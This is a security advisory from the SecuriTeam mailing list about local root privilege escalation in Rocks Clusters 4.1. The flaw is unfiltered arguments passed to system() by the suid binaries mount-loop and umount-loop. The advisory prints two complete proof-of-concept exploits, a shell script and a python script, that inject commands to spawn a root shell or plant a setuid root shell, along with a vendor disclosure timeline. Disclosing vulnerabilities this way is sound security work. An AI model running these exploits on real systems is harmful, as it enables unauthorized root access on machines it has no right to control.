[UNIX] Rocks Clusters Local Root Vulnerabilities



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Rocks Clusters Local Root Vulnerabilities
------------------------------------------------------------------------


SUMMARY

" <http://distrowatch.com/table.php?distribution=rockscluster> Rocks is a
complete "cluster on a CD" solution for x86 and IA64 Red Hat Linux COTS
clusters. Building a Rocks cluster does not require any experience in
clustering, yet a cluster architect will find a flexible and programmatic
way to redesign the entire software stack just below the surface
(appropriately hidden from the majority of users). Although Rocks includes
the tools expected from any clustering software stack (PBS, Maui, GM
support, Ganglia, etc), it is unique in its simplicity of installation."

Rocks Clusters is vulnerable to local root privilege escalation due to
improper validating of arguments in two of its suid and world executable
binaries, "mount-loop" and "umount-loop".

DETAILS

Vulnerable Systems:
* Rocks Clusters version 4.1

1) mount-loop:
mount-loop is a binary that is distributed with suid root and is world
executable.

The problem is the program does not properly filter args to be used in a
system() execution. An attacker could gain root from command line. A
<http://cvs.rocksclusters.org/viewcvs/viewcvs.cgi/rocks/src/roll/base/src/dist/mount-loop.c?rev=1.4&content-type=text/vnd.viewcvs-markup> link to its source can be found below.

PoC provided below:
#!/bin/sh
##############################################
## rocksmountdirty.sh: Rocks release <=4.1 local root exploit
## make sure 'mount-loop' is in your path for this to work.
##
## coded by: xavier@xxxxxxxxxxxx [http://xavsec.blogspot.com]
##############################################
echo "Rocks Clusters <=4.1 mount-loop local root exploit by
xavier@xxxxxxxxxxxx [http://xavsec.blogspot.com]";
echo "getting root.. goodluck"
mount-loop "null" "null" "null; python -c 'import
os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'"

2) umount-loop:
umount-loop is a binary that is distributed with suid root and is world
executable.

The problem is the program does not properly filter args to be used in a
system() execution. An attacker could gain root from command line. A
<http://cvs.rocksclusters.org/viewcvs/viewcvs.cgi/rocks/src/roll/base/src/dist/umount-loop.c?rev=1.4&content-type=text/vnd.viewcvs-markup> link to its source can be found below.

PoC provided below:
#!/usr/bin/env python
##############################################
## rocksumountdirty.py: Rocks release <=4.1 local root exploit
## quick and nasty version of the exploit. make sure the . is writable
and
## you clean up afterwards. ;)
##
## coded by: xavier@xxxxxxxxxxxx [http://xavsec.blogspot.com]
##############################################
x=__import__('os');c=x.getcwd()
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs
%s/shell\nchown root.root %s/shell\n" % (c,c,c))
print "Rocks Clusters <=4.1 umount-loop local root exploit by
xavier@xxxxxxxxxxxx [http://xavsec.blogspot.com]";
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)

Vendor Response:
May 31, 2006: Initial contact
Jun 1, 2006: Response, Disclosure, Verification of bug, redirected to
another project Contact. Fixed in CVS
Jun 9, 2006: Attempted contact after 8 days of silence
Jun 28, 2006: Project releases Rocks v4.2 Beta with fix
Jun 30, 2006: Attempted contact after 29 days of silence
Jul 5, 2006: No contact


ADDITIONAL INFORMATION

The information has been provided by <mailto:xavier@xxxxxxxxxxxx> Xavier
de Leon.
The original article can be found at:
<http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txt>
http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] Oracle Database Local Untrusted Library Path Vulnerability (Technical Details)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Oracle Database Local Untrusted Library Path Vulnerability (Technical ... allows a user in the OINSTALL/DBA group to scalate privileges to root. ...
    (Securiteam)
  • [UNIX] KPopup Allows Gaining of Elevated Privileges (Insecure system())
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... compiled and install the binary KPopup is installed setuid root it also ... especially on a setuid root binaries. ... To exploit this we need to do is make a shell script and call it killall, ...
    (Securiteam)
  • [UNIX] Sun Microsystems Solaris ld.so Directory Traversal Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Sun Microsystems Solaris ld.so Directory Traversal Vulnerability ... potentially allow a non root user to execute arbitrary code as root. ... This message file is meant to contain format strings used to build error ...
    (Securiteam)
  • [UNIX] bsdmainutils Local Root Compromise
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in its calendar program allows local users to gain root ... When called with the "-a" option, calendar will processes the event files ...
    (Securiteam)